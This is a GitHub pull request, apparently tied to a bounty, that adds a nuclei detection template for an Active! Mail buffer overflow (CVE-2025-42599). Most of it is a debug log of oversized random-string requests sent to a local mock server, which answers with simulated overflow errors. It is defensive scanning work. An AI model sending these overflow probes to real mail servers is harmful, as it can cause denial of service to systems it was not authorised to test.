PR
feat: Implemented CVE-2025-42599 - Active! mail - Buffer Overflow
projectdiscovery/nuclei-templates#13071
Template / PR Information
This PR adds a detection template for CVE-2025-42599 affecting Active! Mail Server versions ≤ 6.60.05008561. The vulnerability is a stack-based buffer overflow in the mail processing interface allowing remote unauthenticated attackers to execute arbitrary code or cause denial-of-service conditions.
Template Validation
I’ve validated this template locally?
- YES
- NO
pranjal@PranjalLappyx:~/Desktop/nuclei-templates/activemail-docker-test$ nuclei -t ../http/cves/2025/CVE-2025-42599.YAML \
-u http://localhost:9999/ \
-debug -v \
-debug-req -debug-resp \
-include-tags dos \
-o "docker_test_comprehensive_$(date +%Y%m%d_%H%M%S).txt"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.7
projectdiscovery.io
[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
GET / HTTP/1.1
Host: localhost:9999
User-Agent: ywyTAtqZiLQoOIsRghgbSzBQBmevlhBFKJyybxQqesfBasrSPjnCAJLXjekvYWdROqAfllTeIdiCnHmknIRAQosifsgLgrfdaHLiyAeAYJCqqlEtxbNWKHfUMBvPtYKLilEptfdkJAzOurclvexmUDboTIDRFoLkXbzBEQoCONZVqyMoZdFWbALoKGlIwSoLHADCfemnoxLSeuYvOxNseRcSQjchsJazGFpZLEERlXktlqSKRDFXxMPeZkozRjrLtpUYPLzafmhmwmhYijezaKnejYBUDNIwPYKTuZOeCrstKFnAQafYzDjhAkiyaNTSAechiSQdDApzgwfNWDsPXCXvqYmuRaCINKZkwvZgsXhltKZtFPLFWhzXiWVPiEZwXUUSSFYBJmpRsuRKeqtMnAOUdDMGIBqGWzuGlzcrWItSpmCcLreltTKDQnGWKINdGCoaiXwvfYztiIEurbGUxWQTdoqACslctdhufNMcRGuSaTIqWSSUlaaiYYmQSLJDBNeMyCNhQSWjvfhaNdCXhKrrVyxTBYqeYLTmOlBSQiBgPhccsDAfVUTmYjEjaoqsVHYGGfVaEKejKcPSRxBNjcTBtkMSlUiTGAKVYGcANeBOpKtrZPITUDTyXZIZmRWSbzIbAKJqVTzjxVALUmBMQgEpKkkwlmQBdgSrwlUcxjAmGEgTUQHltxlSFhOdvhSrChPOSMMvnxrqIneBnDqbvNbJgKtVeIsmLuMCJKAOtTPvzrFfNVbjaHdmgSGNrfSzTygzMzRSQRCTsfTLvvcgAKLpzsXfUuzTLfRJXRFOmhRkTpBhgVuJOQziulKgFtWAxufCDlbJmLjEfhDNZcyjFVrulSAWHVQxkWUmHUdprqQOTYHehKvvUVBUCeeqmNkEbeopDCUqxEyyAvipmumfmHEqVUdwNqNcmuExJcIRXmXLxatvulThUfmjwplLQpPLBLBSuBsfCcbitZblfxZotIqrATPqZjUfwgDezbFC
Accept: */*
Connection: close
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
POST / HTTP/1.1
Host: localhost:9999
Content-Type: application/x-www-form-urlencoded
Content-Length: 1001
Connection: close
gKewJtRuToNCpmPHLcozgSNkmvHOnOcTxuZKdHBDngDlaEzXoimMlMBqKSMlbfPgeoPiAzcGrptFWBhxrcKIPUCKZIvNmzZlwHJHrDyDuGASaprcoIeiZVoeapQQbldYIbJeFeIPGukevxBeamuJkKLiGplJrsHVXxeSNCmQcekblbIOAjjGySuConZHQIcUishblpwgyQzsOpfiLVRwoKBSnRCdWDXAkrxDkXWtjhWPaMDIxeOnFRZjZgSAGOErrvzeiuTjSwHsCCoeoVMNJQikIKpBqQDwpAGjPFAMrPGoNYtWAsiowATfIugGilgTofYusiOJOJvgzOTPudHAsiPcLVJIHjDrevcOYdlQrLNVtFFtRjoHKBKtBLCSkPwSYMslVnSocbnrTCCqqIIttNhZiBDsmaaIkFhZYYztIRVMkpIAIzgXXBRAPhQeUfcAuNDbVVuAYPQpomLszhSHagbBsbFiWOKaUmmjiSawYPRarTGnRDiNFNhthVjzFVbYcNmoUtIKqhdXBhToenREkrLbQigOVGdqqkLrFFGAwzKewvjpXjhwgeRAtBOQTTlFsiACcnYdLhjvGQSYdqlFzPLMAKoPCgOWvAesvDqhRbJabKgceUMRYhDTAehUzMSoaTQfAWKviWyJlrCMJbPfDtdkpCCmhkVFDSKSOHzvzWgcaTSzbdOKJDjWuqoRnGnOxdfaYdjZWPHjitOXpgfsYMMICRuMVArHkCGVOSEcWWvDiLqLnHJAmhXoLaVDZaNtoxZIHtYsLTrfGCVanIyJbDNIUBlQgiLVXdRQSMztvgPrPsHogWFWnoGpihGzqyvdQUVDZQhqEgcixXdWtthOSMrXPRMwRodoPkcDpYiwTwWHTGhPaimgGpWXEpbZyfQSDoNPVTvkpJuPsHMkgEDLAfpjLOLhuxZBkJQWQKvhWLVkcdiitEwYDHjjHhFCpKAwARRkoXdLVeTAbKTlUzVCGKnDGYmMqpVxbcPDouIu
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/
HTTP/1.1 405 METHOD NOT ALLOWED
Content-Length: 153
Access-Control-Allow-Origin: *
Allow: HEAD, GET, OPTIONS
Connection: close
Content-Type: text/html; charset=utf-8
Date: Tue, 02 Sep 2025 21:29:55 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/
GET / HTTP/1.1
Host: localhost:9999
JDVQcaJkSQCONQEcscMzojxHVnlDYxfDXqyhBfXiYccDsBVFCtEEnDpJCwDZmFXLzSNeBkBPOdjuFibCuXKOXQuPVtkHJHhWjuefsgGROfUTcNLRctAynuoqnjCqSxWfMxVhbkedyRaRXLKexoPfKgqPYvivgTtEXPiKfJjqQGhPztDszzvBcDtBrJrUIwxRDeLUOjgIeFqpmoyjAGCacjkwpHzRoSkNvpTZuZkdKpRmLazNWoDVBrLsbEurbcMKqqSIrvdVnixQUdToFjxHnLPnIZEQeFTaCrjCGLxGnfVfBUSGfXbdqjXLdnsKHxaTvgxsLTnVxavAuvbQWOmwiaVMycGnfrCfIVjVntLVXYYcittgATXcWPgVnuIxmYrNHrQVeoBswMHCXNZKJPggByMCliOzWHQtkYJBzbPYMtPxefKCUsRSvoIWNAaRLxydRVNtjOJwQakHqpFxXZhOnYYZayoBXfFBjUxjhZMLlXqxqJvnkxZqjIffmoGUHjdDwryCxyiJoRZdvSNKNYiciPUmNJuNViIfwoXHQCnLjBXZkuoZEVYtvBclrxYSOyBjBYhkmzsJTcdzltCCiWqnECdgsIEUyImXCAiyGEjNlKeyNsPWpofuWWQCbHatldXIeCWrryXyakUkOghBVeMcZJiUSaBYTQPPbqsNWGAvaXSNSZdreiFjDDOMBazIaVqmGMEsCECIztUkXWEpUecqmzRWzNzppNHlKgiOJsZpQKhoHsxDdybgTzdvxzPjinGztzZfQfPdpbMNVZqYYoXawgxNnbXASwHc: brAwMhaxtQXwxXXiwmeMZMICHBAqOrjwuAqurXnvYTBdHcwEKVnyBWxKRMCxoRTAzaryHivIFeCukQQYfYaGOKvIXurHJhQvHRHVoDlFqTmgYKelYVqNIsqMRxBGTrzzTVqlrWrngQcAPzqbvclKvBNqceOvtsvyFUvKLqOMUIacCicMnfERICOPJrvFreepmiUYpHSN
Accept: */*
Connection: close
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/mail
POST /mail HTTP/1.1
Host: localhost:9999
Content-Type: application/x-www-form-urlencoded
Content-Length: 1200
Connection: close
SWPdhCMwroCmhCQdwmJXRsSWrNhnXFnTFNikCCQmpwTqBdKjzGlIkGYEiGXmdZZVNeuJRRaGalLNFPDUyYTVdQmsJWIrqGrduPeRwuNqwUOIFOwzLHuTPeXhlEDdyBFCqETqhiGcswEwcyJhQuBTdgGDDzJVluzUWhjeDgpawOWNUBYzVXhjnQpjVmwSBlXnmXmXOPQWwOWrxQpEiSptgZsDQjhNyPYwfdAYxkNjtObQCFHZTqrNkoUkRaArdiARTnhthzQBTLYgPijcWFklzyQLysUXdIbXEErCtoFaxKRTwlaBBICMkCbPCkEvBRLYgtgrBGVOfvItjyBFbQFFBhEHnqXpmLSYCJEkDVCiYGaSuAmGtxzhfZrWQEjUxsqEBoXrXZowLHwDcbxoSNXShBcPbqLXXUzXQdJvhPZgDNdAsunZiiRCPrhXlLHpACTGLQPNerrWZKamZpufZiCNGRlbIuEeJhwsEbxDnIHbOjUNsxVKsppgfoszKOLLtIlwOzSPvORDgwKQcjpiUQnPlPGVTBAyYCifXmBRcPmMBYhArEJhSoVvuhFXbSUiAEYjByFzzEPvjUJEhdQZBtdRYprCTOiYlvmVbnaEktfimtqhihDPfSuKkFcLgQfzcBxKSIAgfRqjeZAeFZbnJJdLiusjbCRhsTmLEugtkunUxfQZvFCvnyuTspUYSYvVidujFjxqtgIbTyuMKdQiSJNvBQDAGSUdKvhBYEzYWuCNHCtdqTsXTJRXgyzbXXlrUPLiYFGsKiHXEXtuFFbKDWqoKXYqUuPJTwmtpMMEkoTRlXYBNyXROOqQGvOpbSlaMBGPlAplYIspUPcrKhMzjSLPaCobhGCBqqgFsdmwfbvrcKZLeGSLhBHrgFIgbIRWXZzBVLrTkgBJGkyDkKRRdmTQxNCzakrNVojYjQzJwLgbZJUXjuFJAcSNsDQIdSRZEoYcXApwaCtiTdHhEOMOoYYBzhvvTgebsNDXJjgMYVziPIZQnywnzgQKVRGtNDFrcgdlFZVoUtVcEpIasXiNvssNFTUdiPvAmTZXZRWxIAMrNMPClZiFaJbVGwxqLvXExXOlITCJCEvgvUMukSIZKuMGsUOJUhJobHDJjWdSsZsXuenEqWLLFpsfSnuIKsMLxbvIPiXZjblJzHuKgkmPPcIVRyhWsqVtkWGMfITzdwvvGSxbfRZi
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/mail
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/mail
HTTP/1.1 503 SERVICE UNAVAILABLE
Content-Length: 55
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/plain; charset=utf-8
Date: Tue, 02 Sep 2025 21:30:25 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
Service Unavailable - Stack Overflow Error in POST Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/mail
[INF] [CVE-2025-42599] Dumped HTTP request for http://localhost:9999/smtp
POST /smtp HTTP/1.1
Host: localhost:9999
Content-Type: text/plain
Content-Length: 1500
Connection: close
ncdFZwyVdtkuYJkXwjojnDZnDWZnrglgTYutMQadxANjVZADqPycrJgdOnqitvTiNTVbGdOPPmLYBAdrHYAQssvkHgjyhozRCptQlcsyQbCzeCGRaPiKOsVMkGZhbRrprKtlpzeiJQeVyTPMZaCkUbKVhnogGwROWVUpvsGDsNNyBrDmSMooTIvPivbBObYUYXvinXcAJhixkgVKDOEkuRRvGcRCICDkhQwUDFhlMdmRqZJhslOndPfUsJIZgeCqPXrmaFGkiPwDBgXWyofdDADSlkLYeAmKsuXnBDBJxzcEHFaOIFqNTsCxfbNdRmwXeHvUyjyjhTBopGyjrXwZtbNwmeCdnGbuubcsEbPHTsTjLSQetDaeAbFQDPoqNYayTkpgqUwAmZdskQxIQDHRzpmYwpbEzQGkTYCYjufecYPbiwYefcrZzlRMLEyZsSFyQPEpuGHeSLyvZtvsdZWgrlmTMMGsDFbMRPwHWqaRtILuSeOnetIhZkppUWNtWJADRSBrDuITsOGKcirOAaqqaalnFuCZvmKZdVmuzVmsluLUAMeeMQJJbalboqERRgZwWXrLLIjrNudRehFqHCAJhZDvbJfPdRgTHnBuEYTugFufJSGZhtIjThFlZhdNueSzzFPHpeFuHVAELvNNpKZUjALhxsiowlDflFYZxEYAcZthVneHqblddIsUAvLAaRtzGlKXJyiqFWhLusCnqmbyotzaDrIKxymCMokJSzvAPbcYKWwiMtTzGuhbkygbvtMRWUoSyHszzSnEZmyIogpZncFPZvwBPPJznQvCTOAsMOtwiubvbHpGSukhFGhWMaQertwBqTGzqKcSVjLqMqFVHEpTyfUIAfiTfMYmfFfdxUQUAfRdvkjyiXwBMeQaotLsUNXfeNQrKXsAdMCCiYrMqbwpjLznWGljJjYhAdFSnbSBMFNSDeHyUCgMhRstAzXpgEIKkOFnQNAmNglNjZEIxFjYWVIEWLixUxSPEhLTwfzexqtbkZugMJKvHUXZXMozkmkeEJQFcQDmbFYQJXlqLmZotlnPcsYySJYvsTugFigNWsKkmunuGPYuREBJELOMZSDsnHNpqPCoEEluzJQalkeIucQRylpwgKWoTEjEIBfIKOEsfScCCDBkHOcQfgpRThFgfrcxpnhzMMZqIEquPYMiTfsozdvvHvutaobEFdzeWCXQVMtlOKDxjPeclRtRfDZqydFPjXmgeLGAtBmVsRBSyfCyagzvZKELZrxcMNnhyYXzRUlTbWqvzdKQdVTeIeTaqhXkSBjLWGbOzLCWDyGFgEObGkcOZwbNOMQaWPoMftueJOHcjTkKJIIjoLgUXUrCVWGUMUzdexxJlBhRrmvAKbceMCxvhYpIbMjMZegOwVECGBrXMAefTWhQrrdnwEYpHueSdPBSaYcPZIoVjNaQCgGgyKXGAftAMhTamSGGFsklDpEbqgFMVKTljsDLExnLZbHNGVvCaltLwMkWAwRGeEQG
[VER] [CVE-2025-42599] Sent HTTP request to http://localhost:9999/smtp
[DBG] [CVE-2025-42599] Dumped HTTP response http://localhost:9999/smtp
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Length: 41
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/plain; charset=utf-8
Date: Tue, 02 Sep 2025 21:30:25 GMT
Server: Werkzeug/3.0.6 Python/3.8.10
SMTP Error - Buffer Overflow in Mail Data
[CVE-2025-42599:status-1] [http] [critical] http://localhost:9999/smtp
[CVE-2025-42599:word-2] [http] [critical] http://localhost:9999/smtp
[INF] Scan completed in 1m. 3 matches found.
Additional References:
- Nuclei Template Creation Guideline
- Nuclei Template Matcher Guideline
- Nuclei Template Contribution Guideline
- PD-Community Discord server
/claim #12963 /close #12963
Claim
Total prize pool
$100
Total paid
$0
Status
Pending
Submitted
September 02, 2025
Last updated
September 02, 2025
Contributors
PR
Pranjal Negi
@Pranjal6955
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$100